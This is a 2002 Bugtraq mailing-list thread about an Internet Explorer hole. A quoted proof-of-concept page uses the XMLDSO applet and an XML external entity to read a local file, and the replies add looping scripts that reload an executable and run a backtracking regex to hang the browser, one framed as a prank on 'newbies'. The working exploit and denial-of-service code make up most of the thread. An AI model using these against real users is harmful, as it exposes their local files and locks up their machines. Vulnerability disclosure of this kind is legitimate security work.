Re: Internet explorer can read local files

["Jelmer" <jelmer () kuperus xs4all nl>]

Thanks to IE's liveconnect features the whole applet should be fully
scriptable, decompiling the applet revealed that there is a public load
(String name) function so you probably can get something like this to work

while (true) {
    xmldso.load('myexefile.exe');
}


here's another code snipped that does what you discribe, It served me well
in the past to get rid of newbies asking how to convert a string to an
integer *grin*

<script language="javascript">

 while (true) {
  try {

   pattern = new RegExp("(a?)b(\\1{2})+c","g");
   text = "bc";
   match = pattern.test(text);

  } catch(exception) {

  }
 }

</script>



----- Original Message -----
From: "Avleen Vig" <lists-bugtraq () silverwraith com>
To: "Jelmer" <jelmer () kuperus xs4all nl>
Cc: <bugtraq () securityfocus com>
Sent: Saturday, August 17, 2002 8:31 PM
Subject: Re: Internet explorer can read local files


> On Sat, 17 Aug 2002, Jelmer wrote:
>
> > <html>
> > <head>
> >  <base href="file:///C:/">
> > </head>
> > <body>
> >  <applet code="com.ms.xml.dso.XMLDSO.class" width="0" height="0"
id="xmldso"
> > MAYSCRIPT="true">
> >   <?xml version="1.0"?>
> >   <!DOCTYPE file  [
> >     <!ELEMENT file (#PCDATA) >
> >     <!ENTITY contents SYSTEM "file:///C:/jelmer.txt">
> >   ]>
> >   <file>
> >   &contents;
> >   </file>
> >  </applet>
> >  <script language="javascript">
> >   setTimeout("showIt()",2000);
> >   function showIt() {
> >    var jelmer = xmldso.getDocument();
> >    alert(jelmer.Text);
> >   }
> >  </script>
> > </body>
> > </html>
>
> This is also a short term 100% CPU consumtion vulnerability:
> replace 'file:///C:/jelmer.txt' with the location of any executable file,
> and IE will consume 100% CPU for approximately 30 seconds. During this
> time, task manager (on Win2k SP2 at least) cannot start.
> Closing the IE window does not fix the problem.
> If it were possible to make the script not time out, this would be a
> bigger problem. There's also nothign to stop you spwaning off other
> windows and such to increase the length of time the user if effected.